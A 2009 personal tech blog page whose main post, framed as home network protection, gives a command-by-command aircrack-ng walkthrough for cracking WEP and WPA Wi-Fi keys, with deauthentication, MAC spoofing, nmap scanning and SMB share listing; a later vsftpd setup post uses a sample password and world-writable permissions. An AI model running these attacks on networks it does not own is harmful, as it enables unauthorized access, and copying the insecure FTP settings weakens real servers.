Sunday, October 25, 2009

The LCD thread

Good place to start when you looking for new monitor.

How to protect your wireless home network

To understand that, we will learn how actually to break them first ;-)
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.

I got Edimax EW-7318USg for ~$30 as recomended devices.

Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.


Simple WEP Crack

Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scan
airodump-ng rausb0

Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method



When no wireless clients exists

Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get some "fragment-0203-180343.xor" file for the next step.

Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec



How to Crack WPA/WPA2

The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap



Other useful stuff

MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But better with
macchanger --mac 00:11:22:33:44:55

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP 10.0.0.1-255

Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16

Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup

Kernel modules control
lsmod | grep 73
modprobe rt73

Trace packets by
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager


Links

aircrac-ng tutorials and faq
Latest nmap

So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.


UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service

Sunday, October 11, 2009

Adobe Photoshop Color management

Adobe Photoshop Color management for dummies (like me)

Tuesday, October 6, 2009

VSFTPD and virtual user

I will show you how to install FTP server on RedHat Linux and made virtual user "upload" with password "kuku" for uploading and downloading files.

First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpd
i got version 2.0.1
[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1
than let's backup original config
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default
now we can edit config for our needs, open vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf
paste the following
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!

Now we should create virtual users authentication file, you can use Apache's tools.
'-c' creates new file (remove it when adding new users), '-b' will take password from command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default

Now we need to tell how vsftpd should check users, it will use PAM that described in
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
#%PAM-1.0
auth required pam_listfile.so item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required pam_stack.so service=system-auth
auth required pam_shells.so
account required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
backup it with
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default
and paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
[alexey@blogger ~]$

At this point you can start deamon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start
and if everything is ok, try to connect to your new FTP.

I was dealing with some problem that even if i use username and password pair I just created, it always was return me "Invalid login". I thought that the problem was in the users file and i rewrited it many time. But it was just pwdfile file missing, that I got from
[alexey@blogger ~]$ sudo tail /var/log/messages
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/pam_pwdfile.so: cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so
All PAM plugins placed in
[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006 pam_access.so
-rwxr-xr-x 1 root root 52334 Oct 13 2004 pam_ccreds.so
-rwxr-xr-x 1 root root 6004 May 12 2006 pam_chroot.so
...
And pam_pwdfile.so was missing :-(
I found it and installed
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
Now it is fine, and FTP auth worked!
[alexey@blogger ~]$ ll /lib/security/pam_pwdfile.so
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/pam_pwdfile.so
Make sure that FTP root is readable and writable for specified user
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory

[alexey@blogger ~]$ ftp localhost
Connected to localhost (127.0.0.1).
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$

Information used